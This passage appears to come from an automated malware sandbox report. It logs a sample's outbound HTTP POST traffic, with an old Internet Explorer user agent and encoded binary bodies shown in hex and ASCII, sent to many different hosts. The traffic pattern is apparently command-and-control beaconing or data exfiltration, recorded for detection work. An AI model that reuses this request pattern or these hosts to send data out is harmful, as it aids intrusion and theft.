59 44 50 6d 78 33 79 4e 39 71 58 56 4c 77 6c 53 65 45 37 43 78 6e 48 32 46 42 30 34 32 66 41 2b 70 66 75 44 2b 7a 37 6e 4b 72 66 62 58 2b 45 6e 2b 54 2f 2b 31 52 44 32 57 42 75 6e 39 4e 64 4b 64 66 77 61 56 67 37 31 2f 41 78 64 6c 4b 58 51 57 66 35 6c 45 67 4e 51 51 53 71 59 45 64 43 4d 43 4d 34 34 49 43 38 77 78 46 74 4e 44 48 51 71 71 38 31 56 31 68 69 61 56 78 70 78 31 36 44 58 4f 38 34 4c 58 71 43 53 4b 39 47 69 79 4a 41 62 58 68 66 6e 65 48 78 48 57 33 59 36 37 6a 73 4e 71 31 53 44 4f 4c 5a 36 2f 6d 4c 42 45 75 76 6b 52 55 70 30 57 42 76 65 36 4e 44 56 2f 32 70 66 6a 68 72 47 53 39 4f 43 62 66 48 45 4d 6d 54 49 54 6d 68 73 67 79 69 65 32 54 4a 55 4d 58 4c 53 32 49 6d 35 6a 41 79 54 52 43 62 58 54 31 2b 36 74 6d 73 55 50 44 30 72 50 59 6c 34 56 38 77 34 67 4f 67 66 44 47 47 65 63 6c 35 73 4b 50 6a 56 59 53 37 61 48 45 69 78 59 36 76 42 37 33 66 66 76 4d 6c 4a 52 6b 77 41 75 75 4f 64 4e 64 4d 41 6c 44 39 71 51 43 64 57 6b 2b 36 73 38 55 4d 6c 75 70 6e 56 4c 74 58 63 4f 62 4d 4d 45 79 57 39 33 72 77 79 6a 71 4f 43 33 2f 71 36 35 6e 34 6e 41 62 38 51 34 6b 55 63 49 48 37 47 59 2b 64 6b 32 59 6d 63 73 6e 51 4f 64 37 37 71 2b 49 73 70 2b 6b 7a 70 38 46 53 4e 4b 72 6e 42 2b 4e 62 55 59 2b 43 54 35 30 48 67 52 70 74 77 67 72 4a 48 6c Data Ascii: IVdCahNaM5XCmteU2hjJEbxxvaP5SaBW99hRwU4nSg+Pib3xQcXI1phUINWC1YBqM1CYJ1czkpOZrblf7+/XaIEFx7Zenmh4RNsG3Vvn2VhoLHrZFd4Z3oSI3dsFhM/TNRgnxNY1ARjvOG9NepJCAT1a8/sYDPmx3yN9qXVLwlSeE7CxnH2FB042fA+pfuD+z7nKrfbX+En+T/+1RD2WBun9NdKdfwaVg71/AxdlKXQWf5lEgNQQSqYEdCMCM44IC8wxFtNDHQqq81V1hiaVxpx16DXO84LXqCSK9GiyJAbXhfneHxHW3Y67jsNq1SDOLZ6/mLBEuvkRUp0WBve6NDV/2pfjhrGS9OCbfHEMmTITmhsgyie2TJUMXLS2Im5jAyTRCbXT1+6tmsUPD0rPYl4V8w4gOgfDGGecl5sKPjVYS7aHEixY6vB73ffvMlJRkwAuuOdNdMAlD9qQCdWk+6s8UMlupnVLtXcObMMEyW93rwyjqOC3/q65n4nAb8Q4kUcIH7GY+dk2YmcsnQOd77q+Isp+kzp8FSNKrnB+NbUY+CT50HgRptwgrJHl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 31 55 64 54 5a 37 42 42 4d 35 55 7a 31 6c 75 7a 77 32 6c 6c 70 6d 50 45 51 57 42 59 65 6d 4f 30 35 50 4e 33 71 54 71 68 47 69 62 49 38 55 56 37 4d 44 72 64 67 41 38 34 2b 78 4a 50 78 2b 62 74 79 4e 46 49 62 39 6c 6d 52 31 6f 2f 7a 75 69 61 63 5a 43 6a 6c 64 7a 48 53 6f 6e 70 62 54 6f 48 6f 6c 4b 31 48 59 64 75 53 5a 35 4a 68 41 48 54 6d 35 50 31 6a 77 77 65 63 75 7a 53 64 6f 6b 71 54 46 36 44 32 61 41 73 44 41 76 37 39 35 56 62 64 63 45 4e 46 42 36 78 36 31 50 2b 48 34 30 54 4d 36 6e 4b 30 4b 4f 2f 4f 53 5a 42 31 6f 55 65 31 4b 69 43 51 46 6e 4c 6a 41 4d 70 77 35 4b 57 34 56 67 50 6d 34 6b 32 57 41 47 78 48 54 52 66 39 71 6b 78 49 50 65 79 54 53 68 55 7a 33 53 77 31 4c 2f 46 2b 63 75 2b 47 78 6a 38 54 42 76 46 35 6c 5a 6c 6a 33 4e 51 6e 31 4b 61 36 65 46 35 78 46 30 5a 52 74 58 78 4b 42 35 6d 45 68 62 52 31 50 47 4a 66 4b 77 57 33 4f 57 71 42 48 52 6f 48 32 48 38 61 49 30 73 76 48 46 65 6b 59 39 55 75 6d 41 52 6c 32 45 4d 74 39 69 38 66 62 6a 71 35 63 62 63 69 78 43 74 41 51 6a 6d 62 4c 7a 59 32 47 75 44 35 4a 37 5a 4f 6c 76 4d 4e 62 44 4c 62 71 71 61 30 2f 4e 75 7a 43 56 62 69 6d 4d 70 50 2f 6f 42 53 6d 71 5a 58 2b 65 6c 61 49 6b 64 56 69 79 30 49 6a 59 58 6a 72 68 6a 6c 31 2b 50 31 46 47 4f 4b 4e 53 68 65 49 33 4b 37 6d 37 49 6b 51 4c 63 6f 62 67 35 61 72 33 6c 45 45 38 67 71 47 6f 51 32 75 33 57 49 74 76 62 32 68 36 58 77 50 34 58 4f 56 51 4f 72 57 65 76 39 34 66 37 42 43 61 57 47 4a 78 6f 58 37 63 52 79 46 38 7a 62 4f 58 45 2f 78 65 57 54 33 61 6e 69 4f 68 46 39 52 42 65 54 45 47 30 6f 5a 42 48 61 51 32 30 64 51 33 55 57 31 34 5a 6c 79 45 74 4c 62 59 42 7a 56 6e 61 75 39 6a 2b 53 71 34 30 63 65 75 72 65 46 65 7a 67 4e 77 6d 43 4b 6d 76 4d 55 77 37 44 6e 77 38 76 57 57 6a 55 72 55 62 75 4a 56 66 31 78 77 41 77 5a 6e 75 63 44 62 6f 6e 67 3d 3d Data Ascii: 1UdTZ7BBM5Uz1luzw2llpmPEQWBYemO05PN3qTqhGibI8UV7MDrdgA84+xJPx+btyNFIb9lmR1o/zuiacZCjldzHSonpbToHolK1HYduSZ5JhAHTm5P1jwwecuzSdokqTF6D2aAsDAv795VbdcENFB6x61P+H40TM6nK0KO/OSZB1oUe1KiCQFnLjAMpw5KW4VgPm4k2WAGxHTRf9qkxIPeyTShUz3Sw1L/F+cu+Gxj8TBvF5lZlj3NQn1Ka6eF5xF0ZRtXxKB5mEhbR1PGJfKwW3OWqBHRoH2H8aI0svHFekY9UumARl2EMt9i8fbjq5cbcixCtAQjmbLzY2GuD5J7ZOlvMNbDLbqqa0/NuzCVbimMpP/oBSmqZX+elaIkdViy0IjYXjrhjl1+P1FGOKNSheI3K7m7IkQLcobg5ar3lEE8gqGoQ2u3WItvb2h6XwP4XOVQOrWev94f7BCaWGJxoX7cRyF8zbOXE/xeWT3aniOhF9RBeTEG0oZBHaQ20dQ3UW14ZlyEtLbYBzVnau9j+Sq40ceureFezgNwmCKmvMUw7Dnw8vWWjUrUbuJVf1xwAwZnucDbong==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 43 34 69 33 61 5a 46 56 4d 35 57 65 36 75 5a 7a 4d 42 46 4c 6e 2b 72 44 71 2f 64 50 42 6c 34 76 56 51 58 4c 43 61 65 61 36 73 4b 58 33 69 64 61 6f 41 57 62 52 54 6c 70 41 39 44 77 34 56 73 4e 68 77 75 6b 67 59 38 4a 33 4b 35 36 36 2f 62 4b 43 34 4b 42 6f 51 45 57 59 69 50 62 6c 70 74 46 50 2b 78 50 54 35 4f 59 6f 5a 55 38 48 50 56 44 50 6b 71 69 71 56 68 64 79 55 53 52 77 53 5a 4e 33 4c 45 37 57 45 47 69 58 45 64 55 39 51 70 52 30 36 6a 4b 38 58 4a 43 33 4b 2b 54 44 56 56 70 75 7a 76 34 78 2b 48 58 76 4c 71 48 36 4c 6c 70 77 58 32 4e 77 76 42 43 46 2b 2b 63 73 55 68 38 34 53 6d 6c 64 35 50 45 2b 35 46 66 37 4a 79 4b 74 57 33 70 71 5a 53 49 7a 78 55 44 72 7a 4d 72 57 4b 68 50 73 6f 42 49 58 32 36 2b 53 36 6c 58 35 38 61 4e 4d 61 6f 4f 6a 33 73 50 78 59 75 35 77 4e 6e 6c 48 67 67 57 75 46 31 6c 33 37 74 4e 38 30 63 45 78 38 78 4f 4e 71 33 41 2f 66 75 6a 71 46 66 79 41 32 42 55 70 41 35 71 51 2b 54 79 45 61 7a 44 4c 32 6a 4a 72 6a 44 38 67 6f 30 51 44 4b 53 70 4a 76 73 42 2f 2b 67 4f 50 6f 59 6b 75 65 69 6b 6c 65 62 69 58 4b 36 55 30 38 43 31 6e 47 55 4d 55 54 65 73 2f 50 78 48 70 6f 73 6c 66 4b 44 44 39 4f 4a 78 77 73 4c 5a 63 36 49 69 31 36 65 76 73 31 48 54 6d 46 4d 6b 2b 5a 70 53 51 4e 6e 55 6f 35 64 59 51 73 67 75 4d 33 38 35 74 45 36 66 34 74 62 38 43 6e 6b 57 64 4c 6b 73 2f 75 53 70 56 63 77 4c 4e 6a 78 62 65 54 48 67 77 7a 51 36 47 56 76 79 38 31 43 65 4c 71 58 67 2f 43 5a 2b 2b 54 2f 36 70 5a 54 74 6c 38 38 6c 42 4c 34 39 70 64 6d 6b 67 4f 50 77 7a 2f 51 4a 74 4b 30 37 78 53 55 69 70 37 71 55 37 4c 39 4f 58 63 64 4e 6d 6c 58 43 39 75 42 49 74 71 56 4c 58 4d 73 35 65 30 32 59 79 70 43 56 2f 64 4f 7a Data Ascii: C4i3aZFVM5We6uZzMBFLn+rDq/dPBl4vVQXLCaea6sKX3idaoAWbRTlpA9Dw4VsNhwukgY8J3K566/bKC4KBoQEWYiPblptFP+xPT5OYoZU8HPVDPkqiqVhdyUSRwSZN3LE7WEGiXEdU9QpR06jK8XJC3K+TDVVpuzv4x+HXvLqH6LlpwX2NwvBCF++csUh84Smld5PE+5Ff7JyKtW3pqZSIzxUDrzMrWKhPsoBIX26+S6lX58aNMaoOj3sPxYu5wNnlHggWuF1l37tN80cEx8xONq3A/fujqFfyA2BUpA5qQ+TyEazDL2jJrjD8go0QDKSpJvsB/+gOPoYkueiklebiXK6U08C1nGUMUTes/PxHposlfKDD9OJxwsLZc6Ii16evs1HTmFMk+ZpSQNnUo5dYQsguM385tE6f4tb8CnkWdLks/uSpVcwLNjxbeTHgwzQ6GVvy81CeLqXg/CZ++T/6pZTtl88lBL49pdmkgOPwz/QJtK07xSUip7qU7L9OXcdNmlXC9uBItqVLXMs5e02YypCV/dOz
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 49 56 64 43 61 68 4e 61 4d 35 58 43 6d 74 65 55 32 68 6a 4a 45 62 78 78 76 61 50 35 53 61 42 57 39 39 68 52 77 55 34 6e 53 67 2b 50 69 62 33 78 51 63 58 49 31 70 68 55 49 4e 57 43 31 59 42 71 4d 31 43 59 4a 31 63 7a 6b 70 4f 5a 72 62 6c 66 37 2b 2f 58 61 49 45 46 78 37 5a 65 6e 6d 68 34 52 4e 73 47 33 56 76 6e 32 56 68 6f 4c 48 72 5a 46 64 34 5a 33 6f 53 49 33 64 73 46 68 4d 2f 54 4e 52 67 6e 78 4e 59 31 41 52 6a 76 4f 47 39 4e 65 70 4a 43 41 54 31 61 38 2f 73 59 44 50 6d 78 33 79 4e 39 71 58 56 4c 77 6c 53 65 45 37 43 78 6e 48 32 46 42 30 34 32 66 41 2b 70 66 75 44 2b 7a 37 6e 4b 72 66 62 58 2b 45 6e 2b 54 2f 2b 31 52 44 32 57 42 75 6e 39 4e 64 4b 64 66 77 61 56 67 37 31 2f 41 78 64 6c 4b 58 51 57 66 35 6c 45 67 4e 51 51 53 71 59 45 64 43 4d 43 4d 34 34 49 43 38 77 78 46 74 4e 44 48 51 71 71 38 31 56 31 68 69 61 56 78 70 78 31 36 44 58 4f 38 34 4c 58 71 43 53 4b 39 47 69 79 4a 41 62 58 68 66 6e 65 48 78 48 57 33 59 36 37 6a 73 4e 71 31 53 44 4f 4c 5a 36 2f 6d 4c 42 45 75 76 6b 52 55 70 30 57 42 76 65 36 4e 44 56 2f 32 70 66 6a 68 72 47 53 39 4f 43 62 66 48 45 4d 6d 54 49 54 6d 68 73 67 79 69 65 32 54 4a 55 4d 58 4c 53 32 49 6d 35 6a 41 79 54 52 43 62 58 54 31 2b 36 74 6d 73 55 50 44 30 72 50 59 6c 34 56 38 77 34 67 4f 67 66 44 47 47 65 63 6c 35 73 4b 50 6a 56 59 53 37 61 48 45 69 78 59 36 76 42 37 33 66 66 76 4d 6c 4a 52 6b 77 41 75 75 4f 64 4e 64 4d 41 6c 44 39 71 51 43 64 57 6b 2b 36 73 38 55 4d 6c 75 70 6e 56 4c 74 58 63 4f 62 4d 4d 45 79 57 39 33 72 77 79 6a 71 4f 43 33 2f 71 36 35 6e 34 6e 41 62 38 51 34 6b 55 63 49 48 37 47 59 2b 64 6b 32 59 6d 63 73 6e 51 4f 64 37 37 71 2b 49 73 70 2b 6b 7a 70 38 46 53 4e 4b 72 6e 42 2b 4e 62 55 59 2b 43 54 35 30 48 67 52 70 74 77 67 72 4a 48 6c Data Ascii: IVdCahNaM5XCmteU2hjJEbxxvaP5SaBW99hRwU4nSg+Pib3xQcXI1phUINWC1YBqM1CYJ1czkpOZrblf7+/XaIEFx7Zenmh4RNsG3Vvn2VhoLHrZFd4Z3oSI3dsFhM/TNRgnxNY1ARjvOG9NepJCAT1a8/sYDPmx3yN9qXVLwlSeE7CxnH2FB042fA+pfuD+z7nKrfbX+En+T/+1RD2WBun9NdKdfwaVg71/AxdlKXQWf5lEgNQQSqYEdCMCM44IC8wxFtNDHQqq81V1hiaVxpx16DXO84LXqCSK9GiyJAbXhfneHxHW3Y67jsNq1SDOLZ6/mLBEuvkRUp0WBve6NDV/2pfjhrGS9OCbfHEMmTITmhsgyie2TJUMXLS2Im5jAyTRCbXT1+6tmsUPD0rPYl4V8w4gOgfDGGecl5sKPjVYS7aHEixY6vB73ffvMlJRkwAuuOdNdMAlD9qQCdWk+6s8UMlupnVLtXcObMMEyW93rwyjqOC3/q65n4nAb8Q4kUcIH7GY+dk2YmcsnQOd77q+Isp+kzp8FSNKrnB+NbUY+CT50HgRptwgrJHl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 44 6c 6e 55 2f 6e 64 39 51 4a 57 51 44 77 4b 70 35 72 78 52 77 38 44 43 41 52 38 74 79 79 74 56 6d 32 44 31 34 59 46 54 76 78 6c 6f 43 4c 72 49 74 38 47 36 42 68 4b 4d 6c 4f 59 78 72 6e 48 71 52 69 30 33 6e 52 2f 68 6e 35 2b 35 4f 41 50 69 49 4b 66 70 58 64 6a 56 42 5a 52 56 78 33 50 45 32 6e 62 4f 38 50 6e 76 55 4b 61 41 67 6f 34 78 73 6e 6b 69 77 55 4e 4a 56 79 30 6f 67 47 70 62 2f 52 61 5a 59 31 2b 62 56 5a 58 48 66 58 45 56 69 7a 49 5a 38 4f 34 72 52 6b 4e 32 6f 4e 73 4b 4c 47 68 5a 43 51 55 63 43 33 4a 34 4e 4d 57 62 42 44 56 55 76 7a 58 31 53 4e 6e 71 6c 74 4c 32 6a 6c 6e 31 35 5a 56 39 56 48 71 6d 51 32 6c 70 69 58 43 6c 79 6e 63 33 68 55 44 30 63 68 47 69 48 4a 45 48 30 53 45 4b 64 61 33 45 67 38 41 64 4e 67 46 6e 51 79 56 72 2b 46 2b 37 6d 49 59 79 32 4e 74 43 74 49 49 49 44 77 6c 74 4e 64 66 77 50 36 32 36 45 6b 49 66 38 6f 51 73 77 47 33 54 4b 37 47 34 32 6f 50 62 52 41 46 71 33 4d 77 56 79 31 57 31 46 32 67 4b 50 50 78 6b 39 35 52 66 4a 72 5a 47 5a 36 5a 32 31 76 41 45 38 53 57 59 78 33 2b 55 31 6b 67 73 79 6f 4f 6d 55 49 54 4d 7a 2b 39 72 6e 71 6f 71 50 59 6c 4b 74 51 63 36 77 46 64 69 38 52 47 44 43 42 59 59 53 56 49 48 4e 39 5a 59 52 7a 70 4f 39 6e 38 35 55 69 71 4e 69 54 6e 45 6b 4f 6b 53 4e 31 70 62 74 73 55 62 5a 37 57 55 5a 52 34 42 37 50 77 4f 46 77 6e 49 6f 4b 57 37 4a 50 2b 54 70 4a 4b 51 49 77 30 31 34 56 51 30 76 50 54 70 53 76 52 61 6a 65 43 6a 6d 42 77 50 6a 4f 62 6f 67 76 68 63 31 58 5a 76 66 51 31 78 6c 55 69 39 36 56 78 62 44 52 42 56 4d 48 6f 63 64 63 7a 32 38 48 4e 4f 4a 47 61 51 39 4a 78 72 32 66 4c 4a 52 56 49 6a 76 35 42 78 49 69 67 2f 76 75 6f 36 69 43 4e 4f 61 33 48 68 70 6c 75 67 Data Ascii: DlnU/nd9QJWQDwKp5rxRw8DCAR8tyytVm2D14YFTvxloCLrIt8G6BhKMlOYxrnHqRi03nR/hn5+5OAPiIKfpXdjVBZRVx3PE2nbO8PnvUKaAgo4xsnkiwUNJVy0ogGpb/RaZY1+bVZXHfXEVizIZ8O4rRkN2oNsKLGhZCQUcC3J4NMWbBDVUvzX1SNnqltL2jln15ZV9VHqmQ2lpiXClync3hUD0chGiHJEH0SEKda3Eg8AdNgFnQyVr+F+7mIYy2NtCtIIIDwltNdfwP626EkIf8oQswG3TK7G42oPbRAFq3MwVy1W1F2gKPPxk95RfJrZGZ6Z21vAE8SWYx3+U1kgsyoOmUITMz+9rnqoqPYlKtQc6wFdi8RGDCBYYSVIHN9ZYRzpO9n85UiqNiTnEkOkSN1pbtsUbZ7WUZR4B7PwOFwnIoKW7JP+TpJKQIw014VQ0vPTpSvRajeCjmBwPjObogvhc1XZvfQ1xlUi96VxbDRBVMHocdcz28HNOJGaQ9Jxr2fLJRVIjv5BxIig/vuo6iCNOa3Hhplug
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 35 63 66 35 67 7a 54 2b 2b 5a 51 42 39 46 57 74 6a 35 52 39 4f 34 65 72 45 37 38 73 6d 77 39 55 71 4a 36 48 6d 31 63 68 76 2b 75 63 75 38 72 6e 66 72 41 63 72 68 4d 70 6a 6a 6c 76 41 68 75 39 55 57 68 6e 51 52 44 36 64 45 44 62 57 71 66 6a 4e 6c 6d 72 62 47 4f 4d 4f 50 38 4c 66 65 71 64 73 6c 78 56 6e 4e 7a 58 4e 6a 68 37 32 4e 4e 6b 4f 38 7a 64 35 56 63 6b 4d 6e 44 61 35 70 48 67 49 7a 33 70 77 6d 66 79 58 49 48 2b 36 33 6a 6a 31 50 4b 55 6b 76 49 77 33 4a 30 4d 4b 6f 5a 69 46 5a 71 63 59 76 48 61 6b 34 58 75 6b 73 58 4f 41 6a 33 63 70 43 52 37 54 6c 46 6e 47 74 6d 50 6a 6d 58 63 43 75 53 69 67 73 78 39 52 6e 6e 62 4f 7a 76 2b 78 51 54 70 2b 77 4a 48 78 4f 69 6b 76 6e 35 4d 49 78 62 62 69 57 6a 45 37 59 55 76 54 54 4e 39 74 6b 78 75 2f 78 71 32 52 73 33 32 72 79 51 63 31 4a 44 42 34 55 31 78 58 4c 61 73 61 43 48 41 4a 6f 57 56 76 62 4a 2b 65 37 58 58 7a 2b 41 43 2b 37 57 48 77 35 74 58 57 49 6b 65 57 39 5a 35 50 57 41 67 67 77 59 51 41 7a 39 78 6e 72 6c 6c 66 41 30 63 4f 46 72 39 74 69 44 4b 6b 78 57 43 67 30 63 62 52 73 51 31 64 4b 6a 59 76 2f 74 76 61 6f 59 5a 4f 4e 46 58 6b 4e 51 6d 2b 46 4e 68 65 74 7a 49 5a 69 49 37 49 41 4d 56 66 55 6f 6e 65 41 34 58 79 6b 46 30 48 39 68 33 73 71 72 54 51 54 4b 77 2b 37 4a 7a 6d 38 6c 5a 6a 68 6a 62 33 39 4e 50 31 6a 2b 71 31 36 6d 59 4c 38 30 54 4e 48 37 55 55 66 5a 77 37 63 77 58 59 75 49 46 52 43 32 74 4c 2f 63 6c 4e 46 7a 38 2b 79 75 38 4a 39 64 4d 4b 52 32 74 4a 66 35 2f 63 58 48 61 58 39 7a 69 4a 6a 77 63 47 31 36 5a 33 74 39 66 4c 58 57 6e 53 61 6b 56 53 63 74 72 67 4a 4b 59 49 72 2b 46 31 76 46 51 39 51 41 44 67 41 78 64 72 65 74 50 6e 34 44 78 50 55 51 33 68 57 67 6f 49 38 45 35 33 57 74 58 6f 43 37 45 72 30 32 56 44 4a 73 34 69 77 37 35 67 69 57 6b 32 46 58 2f 31 67 69 35 74 4f 33 6e 41 4a 53 54 73 66 31 56 Data Ascii: 5cf5gzT++ZQB9FWtj5R9O4erE78smw9UqJ6Hm1chv+ucu8rnfrAcrhMpjjlvAhu9UWhnQRD6dEDbWqfjNlmrbGOMOP8LfeqdslxVnNzXNjh72NNkO8zd5VckMnDa5pHgIz3pwmfyXIH+63jj1PKUkvIw3J0MKoZiFZqcYvHak4XuksXOAj3cpCR7TlFnGtmPjmXcCuSigsx9RnnbOzv+xQTp+wJHxOikvn5MIxbbiWjE7YUvTTN9tkxu/xq2Rs32ryQc1JDB4U1xXLasaCHAJoWVvbJ+e7XXz+AC+7WHw5tXWIkeW9Z5PWAggwYQAz9xnrllfA0cOFr9tiDKkxWCg0cbRsQ1dKjYv/tvaoYZONFXkNQm+FNhetzIZiI7IAMVfUoneA4XykF0H9h3sqrTQTKw+7Jzm8lZjhjb39NP1j+q16mYL80TNH7UUfZw7cwXYuIFRC2tL/clNFz8+yu8J9dMKR2tJf5/cXHaX9ziJjwcG16Z3t9fLXWnSakVSctrgJKYIr+F1vFQ9QADgAxdretPn4DxPUQ3hWgoI8E53WtXoC7Er02VDJs4iw75giWk2FX/1gi5tO3nAJSTsf1V
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 51 67 67 4e 6e 56 67 41 4e 5a 56 6c 4a 62 76 6f 57 77 66 62 39 6b 73 42 72 63 34 67 38 73 48 38 44 45 6e 6c 51 75 57 7a 50 66 34 34 59 75 34 4a 76 54 42 44 66 66 4c 2f 30 71 31 79 4c 34 56 76 4e 76 4f 31 50 45 34 4c 47 53 72 58 71 35 54 32 63 55 65 73 45 59 66 63 2b 2b 70 37 52 5a 4c 56 4d 54 63 6f 49 4b 51 4e 74 33 4e 65 6c 51 71 6c 44 61 78 34 55 33 52 58 71 6b 4e 37 6a 4d 41 51 32 72 64 39 74 74 30 70 6b 33 55 7a 6b 57 2b 63 4c 64 39 41 30 74 46 37 64 71 6a 63 68 31 36 53 52 76 4a 77 31 57 31 4a 37 41 78 57 76 38 54 38 4f 50 52 7a 51 65 77 73 49 39 78 57 57 33 37 32 66 6a 32 50 54 4c 57 54 7a 54 45 2b 4a 6b 69 34 59 63 52 4e 74 2f 38 48 4c 4a 39 53 6a 57 59 32 36 77 59 72 38 49 72 75 78 77 44 68 37 68 6e 4e 32 41 5a 30 69 4f 42 58 38 69 65 43 6a 35 32 6f 45 71 6a 52 4b 45 2b 38 59 6f 68 64 2b 6b 52 75 72 30 34 4c 53 59 63 59 64 77 6e 78 35 72 74 51 55 49 54 30 76 62 45 74 39 4e 37 6f 4d 55 53 57 41 32 30 7a 43 6f 32 63 70 31 35 64 52 4e 4e 4a 75 52 32 56 67 53 53 50 54 78 64 72 50 4a 6a 6f 4b 32 51 5a 55 6d 78 6c 70 4c 42 6b 65 4a 77 63 4b 69 32 68 4c 76 59 51 66 76 66 50 34 53 6c 72 61 44 52 44 6b 36 53 46 64 70 74 71 33 4c 6e 55 72 2b 59 69 6c 35 4e 41 70 6d 49 69 4e 56 76 34 6e 2b 70 4c 32 72 58 75 53 76 61 57 70 71 38 44 70 72 33 54 32 6b 73 69 32 2b 46 75 36 74 38 31 47 36 75 55 66 6a 35 6a 6d 72 4c 54 77 30 4b 61 77 2b 4c 73 47 34 67 52 4b 59 53 75 5a 61 4c 66 42 6a 56 6b 5a 63 4b 75 36 53 73 54 61 6e 71 50 37 47 61 38 48 44 2f 6e 4e 70 42 4f 59 64 6e 56 50 67 32 58 66 42 54 4b 6c 2b 4c 78 41 47 35 79 64 6a 77 65 39 58 56 56 44 61 2b 69 38 64 43 50 42 34 6c 6f 53 72 4e 33 75 4d 31 4d 6d 59 2b 76 4a 30 72 49 2b 4d 2b 56 5a 2f 47 44 69 38 45 7a 70 74 6c 41 57 52 39 6e 59 63 67 4e 6e 79 2f 39 57 36 56 6f 47 69 71 41 2b 35 65 50 45 74 4f 68 46 52 34 3d Data Ascii: QggNnVgANZVlJbvoWwfb9ksBrc4g8sH8DEnlQuWzPf44Yu4JvTBDffL/0q1yL4VvNvO1PE4LGSrXq5T2cUesEYfc++p7RZLVMTcoIKQNt3NelQqlDax4U3RXqkN7jMAQ2rd9tt0pk3UzkW+cLd9A0tF7dqjch16SRvJw1W1J7AxWv8T8OPRzQewsI9xWW372fj2PTLWTzTE+Jki4YcRNt/8HLJ9SjWY26wYr8IruxwDh7hnN2AZ0iOBX8ieCj52oEqjRKE+8Yohd+kRur04LSYcYdwnx5rtQUIT0vbEt9N7oMUSWA20zCo2cp15dRNNJuR2VgSSPTxdrPJjoK2QZUmxlpLBkeJwcKi2hLvYQfvfP4SlraDRDk6SFdptq3LnUr+Yil5NApmIiNVv4n+pL2rXuSvaWpq8Dpr3T2ksi2+Fu6t81G6uUfj5jmrLTw0Kaw+LsG4gRKYSuZaLfBjVkZcKu6SsTanqP7Ga8HD/nNpBOYdnVPg2XfBTKl+LxAG5ydjwe9XVVDa+i8dCPB4loSrN3uM1MmY+vJ0rI+M+VZ/GDi8EzptlAWR9nYcgNny/9W6VoGiqA+5ePEtOhFR4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 4d 36 74 64 41 54 71 44 57 5a 55 46 39 6c 32 48 33 62 6e 74 54 48 32 67 51 50 57 71 38 35 42 50 44 6c 6c 2f 47 46 61 4e 6b 33 4c 53 47 4c 38 63 63 66 64 62 78 2f 2f 41 6f 31 48 2f 48 49 58 58 59 4f 59 32 4f 52 33 36 6d 4c 54 7a 48 76 31 44 54 56 71 50 39 69 4d 6d 4c 67 2f 4a 49 78 4e 72 77 72 6b 77 4b 41 59 54 58 68 6a 55 41 62 41 4a 76 44 57 45 37 52 76 53 6d 4a 4e 73 73 4e 4e 55 31 4d 51 6e 68 6a 47 39 39 7a 58 4a 74 34 64 6c 43 4e 37 4d 78 53 5a 66 63 2b 4c 6d 64 66 35 4d 64 31 56 2b 2b 66 4a 4d 77 6e 4f 73 51 79 45 55 32 44 65 6b 49 7a 46 5a 6a 6f 35 4b 78 71 50 4a 49 49 70 2f 50 4c 33 66 71 64 6e 6c 4d 2b 5a 34 79 39 36 45 31 50 69 48 53 36 63 6a 74 41 30 53 44 2b 74 46 37 50 63 50 58 6c 77 74 56 4c 47 53 35 65 58 68 51 72 57 46 66 63 74 72 42 4b 47 4a 6e 6c 56 67 2f 78 57 42 63 4e 6a 64 4f 52 52 4e 38 56 6e 38 79 53 35 2b 56 51 68 30 72 35 4d 6b 73 74 62 4e 39 56 66 55 45 58 36 78 75 31 2f 70 57 31 64 39 56 55 4b 79 36 31 74 68 5a 73 4e 46 69 45 4b 36 6d 67 38 69 30 38 43 6e 6f 64 6e 44 71 6d 42 35 43 39 7a 4f 2f 49 4c 45 52 41 6b 62 71 66 46 74 68 38 4b 63 43 58 62 6f 39 54 33 6a 2b 5a 35 59 42 61 49 6e 6c 6d 4c 4f 49 47 50 2b 73 31 34 33 62 4e 72 71 39 42 65 44 65 4e 70 57 34 39 79 55 32 6a 2f 44 33 5a 31 58 46 4d 64 2f 76 48 35 58 2f 50 35 46 2f 36 57 36 36 7a 47 48 34 33 49 45 6e 57 73 75 64 35 5a 42 47 36 43 57 6c 6f 6f 39 56 41 77 30 37 72 51 46 4b 2b 57 70 69 6b 69 38 4f 59 42 39 4a 56 35 6b 70 41 72 50 57 77 64 45 46 69 2b 35 45 39 5a 6a 36 30 4e 51 4c 45 47 49 49 76 59 32 32 43 70 31 76 4d 75 72 2b 63 4e 66 38 31 6f 68 79 6c 4b 71 76 52 44 76 57 52 47 48 2b 78 52 75 56 59 65 53 42 49 4f 44 52 78 47 45 45 2b 74 31 65 38 30 71 4d 4d 7a 49 4a 42 54 72 78 58 50 76 4d 77 67 59 Data Ascii: 